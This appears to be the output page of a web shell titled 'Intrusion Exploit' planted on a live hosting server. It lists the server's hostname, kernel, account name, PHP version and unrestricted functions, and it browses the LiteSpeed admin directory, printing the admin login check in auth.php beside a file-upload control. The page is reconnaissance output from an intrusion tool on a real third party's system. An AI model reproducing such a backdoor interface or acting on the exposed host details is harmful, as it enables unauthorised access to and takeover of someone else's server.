Intrusion Exploit
Server: LiteSpeed
System: Linux cisadane.iixcp.rumahweb.net 5.14.0-427.42.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Nov 1 14:58:02 EDT 2024 x86_64
User: lenf4658 (1805)
PHP: 8.4.19
Disabled: NONE
$ pwd: /usr/local/lsws/admin/html.6.3.1/includes/
Upload Files
File: //usr/local/lsws/admin/html.6.3.1/includes/auth.php
<?php

require_once('global.php');

$client = CLIENT::singleton();

if ( !$client->isValid() 
	|| (isset($_SERVER['HTTP_REFERER']) 
		&& strpos($_SERVER['HTTP_REFERER'], $_SERVER['HTTP_HOST']) === FALSE)) 
{
	$client->clear();
	header('location:/login.php');
	die();
}
@ Telegram